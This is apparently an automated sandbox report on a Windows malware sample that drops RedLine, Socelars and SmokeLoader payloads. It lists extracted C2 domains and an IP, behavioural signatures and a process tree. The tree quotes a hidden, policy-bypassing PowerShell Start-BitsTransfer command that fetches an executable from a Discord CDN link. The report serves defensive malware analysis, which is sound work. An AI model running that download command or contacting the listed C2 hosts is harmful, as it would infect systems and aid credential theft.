Resubmissions

10-11-2021 14:52

211110-r84p8aedej 10

09-11-2021 13:19

211109-qkrv3sfcg4 10

Analysis

  • max time kernel
    167s
  • max time network
    185s
  • platform
    windows7_x64
  • resource
    win7-en-20211104
  • submitted
    09-11-2021 13:19

General

  • Target
    4a4a606501eea3b8b9e128412455243ca20de0efe374c9c47ff3b5caac457375.exe
  • Size
    5.0MB
  • MD5
    2b0ce83a2a1065ef402b7a50f45892fd
  • SHA1
    d66a565247f9df9ac0bdb3725eee121e98d8914d
  • SHA256
    4a4a606501eea3b8b9e128412455243ca20de0efe374c9c47ff3b5caac457375
  • SHA512
    42d19f0130d34a3b37e78b6f1ba9c3c7e07d99e0a76dc005be976c51c2a363e64d475b9caa6805d3e8c1da2a4d32020f307eaae68b41d8c815ae1da8ec0db2ca

Malware Config

Extracted

  • Language
    ps1
  • Source
    exe.dropper
  • URLs
    https://cdn.discordapp.com/attachments/523238636561629190/894846072097218580/ghielufuzymmuibugkhmviaajvfwio.exe

Extracted

  • Family
    socelars
  • C2
    http://www.iyiqian.com/
    http://www.hbgents.top/
    http://www.rsnzhy.com/
    http://www.znsjis.top/

Extracted

  • Family
    redline
  • Botnet
    05.10
  • C2
    80.92.205.116:59599

Extracted

  • Family
    smokeloader
  • Version
    2020
  • C2
    http://gmpeople.com/upload/
    http://mile48.com/upload/
    http://lecanardstsornin.com/upload/
    http://m3600.com/upload/
    http://camasirx.com/upload/
  • rc4.i32
  • rc4.i32

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 12 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 50 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 35 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 16 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:880
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:1976
    • C:\Users\Admin\AppData\Local\Temp\4a4a606501eea3b8b9e128412455243ca20de0efe374c9c47ff3b5caac457375.exe
      "C:\Users\Admin\AppData\Local\Temp\4a4a606501eea3b8b9e128412455243ca20de0efe374c9c47ff3b5caac457375.exe"
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1516
      • C:\Users\Admin\AppData\Local\Temp\Graphics.exe
        "C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks whether UAC is enabled
        • Suspicious use of WriteProcessMemory
        PID:820
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Graphicss.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Graphicss.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1700
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" [obfuscated command line omitted]
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1836
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E [encoded command omitted]
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2312
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command Start-BitsTransfer -Source https://cdn.discordapp.com/attachments/523238636561629190/894846072097218580/ghielufuzymmuibugkhmviaajvfwio.exe -Destination C:\Users\Admin\AppData\Local\Temphkfmxgfdblkdcgixkfksjlgmfkofgu.exe
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2572
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden -command Start-BitsTransfer -Source https://cdn.discordapp.com/attachments/523238636561629190/894846072097218580/ghielufuzymmuibugkhmviaajvfwio.exe -Destination C:\Users\Admin\AppData\Local\Temphkfmxgfdblkdcgixkfksjlgmfkofgu.exe
                  7⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2728
      • C:\Users\Admin\AppData\Local\Temp\FoxSBrowser.exe
        "C:\Users\Admin\AppData\Local\Temp\FoxSBrowser.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1884
      • C:\Users\Admin\AppData\Local\Temp\Process.exe
        "C:\Users\Admin\AppData\Local\Temp\Process.exe"
        2⤵
        • Executes dropped EXE
        PID:1404
      • C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
        "C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1492
      • C:\Users\Admin\AppData\Local\Temp\Install.exe
        "C:\Users\Admin\AppData\Local\Temp\Install.exe"
        2⤵
        • Executes dropped EXE
        PID:992
      • C:\Users\Admin\AppData\Local\Temp\Folder.exe
        "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
        2⤵
        • Executes dropped EXE
        PID:1952
      • C:\Users\Admin\AppData\Local\Temp\Files.exe
        "C:\Users\Admin\AppData\Local\Temp\Files.exe"
        2⤵
        • Executes dropped EXE
        PID:1736
      • C:\Users\Admin\AppData\Local\Temp\File.exe
        "C:\Users\Admin\AppData\Local\Temp\File.exe"
        2⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Loads dropped DLL
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1040
        • C:\Users\Admin\Pictures\Adobe Films\MwQRXOmgQ5eY9M3tTDamT97_.exe
          "C:\Users\Admin\Pictures\Adobe Films\MwQRXOmgQ5eY9M3tTDamT97_.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:824
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 1108
          3⤵
          • Loads dropped DLL
          • Program crash
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          PID:2924
      • C:\Users\Admin\AppData\Local\Temp\Details.exe
        "C:\Users\Admin\AppData\Local\Temp\Details.exe"
        2⤵
        • Executes dropped EXE
        PID:1768
      • C:\Users\Admin\AppData\Local\Temp\pub2.exe
        "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
        2⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        PID:1656
    • C:\Windows\SysWOW64\rundll32.exe
      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
      1⤵
      • Loads dropped DLL
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:968
    • C:\Windows\system32\rUNdlL32.eXe
      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1052
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      PID:1760
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1760 CREDAT:275457 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2536

Downloads

  • memory/880-167-0x0000000001300000-0x0000000001372000-memory.dmp (456KB)
  • memory/880-166-0x00000000007B0000-0x00000000007FD000-memory.dmp (308KB)
  • memory/968-163-0x0000000001D60000-0x0000000001E61000-memory.dmp (1.0MB)
  • memory/968-165-0x0000000001E70000-0x0000000001ECD000-memory.dmp (372KB)
  • memory/1040-177-0x0000000003BC0000-0x0000000003D0C000-memory.dmp (1.3MB)
  • memory/1220-164-0x0000000003A40000-0x0000000003A55000-memory.dmp (84KB)
  • memory/1404-138-0x00000000023F0000-0x000000000240D000-memory.dmp (116KB)
  • memory/1404-155-0x0000000004DB4000-0x0000000004DB6000-memory.dmp (8KB)
  • memory/1404-92-0x00000000009D9000-0x00000000009FC000-memory.dmp (140KB)
  • memory/1404-132-0x0000000000220000-0x0000000000250000-memory.dmp (192KB)
  • memory/1404-139-0x0000000004DB1000-0x0000000004DB2000-memory.dmp (4KB)
  • memory/1404-144-0x0000000004DB3000-0x0000000004DB4000-memory.dmp (4KB)
  • memory/1404-134-0x0000000000400000-0x000000000088B000-memory.dmp (4.5MB)
  • memory/1404-97-0x0000000000BC0000-0x0000000000BDF000-memory.dmp (124KB)
  • memory/1404-143-0x0000000004DB2000-0x0000000004DB3000-memory.dmp (4KB)
  • memory/1492-170-0x0000000003170000-0x0000000003180000-memory.dmp (64KB)
  • memory/1492-95-0x0000000000020000-0x0000000000023000-memory.dmp (12KB)
  • memory/1516-55-0x0000000074E51000-0x0000000074E53000-memory.dmp (8KB)
  • memory/1656-146-0x0000000000230000-0x0000000000239000-memory.dmp (36KB)
  • memory/1656-123-0x000000000177C000-0x000000000178C000-memory.dmp (64KB)
  • memory/1656-147-0x0000000000400000-0x00000000016C8000-memory.dmp (18.8MB)
  • memory/1700-77-0x00000000009A0000-0x00000000009A1000-memory.dmp (4KB)
  • memory/1700-140-0x0000000004AB0000-0x0000000004AB1000-memory.dmp (4KB)
  • memory/1760-181-0x000007FEFB931000-0x000007FEFB933000-memory.dmp (8KB)
  • memory/1768-142-0x000000000030C000-0x0000000000328000-memory.dmp (112KB)
  • memory/1768-150-0x00000000001B0000-0x00000000001E0000-memory.dmp (192KB)
  • memory/1768-151-0x0000000000400000-0x00000000016D9000-memory.dmp (18.8MB)
  • memory/1836-182-0x0000000001C90000-0x0000000001C91000-memory.dmp (4KB)
  • memory/1836-183-0x0000000001C91000-0x0000000001C92000-memory.dmp (4KB)
  • memory/1836-185-0x0000000001C92000-0x0000000001C94000-memory.dmp (8KB)
  • memory/1884-79-0x0000000000D80000-0x0000000000D81000-memory.dmp (4KB)
  • memory/1884-169-0x000000001AE10000-0x000000001AE12000-memory.dmp (8KB)
  • memory/1884-148-0x0000000000250000-0x0000000000251000-memory.dmp (4KB)
  • memory/1976-161-0x00000000000E0000-0x000000000012D000-memory.dmp (308KB)
  • memory/1976-203-0x00000000004E0000-0x00000000004FB000-memory.dmp (108KB)
  • memory/1976-168-0x0000000000450000-0x00000000004C2000-memory.dmp (456KB)
  • memory/1976-204-0x0000000003160000-0x0000000003265000-memory.dmp (1.0MB)
  • memory/2312-188-0x00000000024E0000-0x000000000312A000-memory.dmp (12.3MB)
  • memory/2312-192-0x00000000024E0000-0x000000000312A000-memory.dmp (12.3MB)
  • memory/2312-190-0x00000000024E0000-0x000000000312A000-memory.dmp (12.3MB)
  • memory/2572-195-0x00000000023C0000-0x00000000023C1000-memory.dmp (4KB)
  • memory/2572-199-0x00000000023C1000-0x00000000023C2000-memory.dmp (4KB)
  • memory/2572-200-0x00000000023C2000-0x00000000023C4000-memory.dmp (8KB)
  • memory/2728-198-0x0000000002490000-0x00000000030DA000-memory.dmp (12.3MB)
  • memory/2728-201-0x0000000002490000-0x00000000030DA000-memory.dmp (12.3MB)
  • memory/2728-202-0x0000000002490000-0x00000000030DA000-memory.dmp (12.3MB)
  • memory/2924-205-0x00000000005F0000-0x00000000005F1000-memory.dmp (4KB)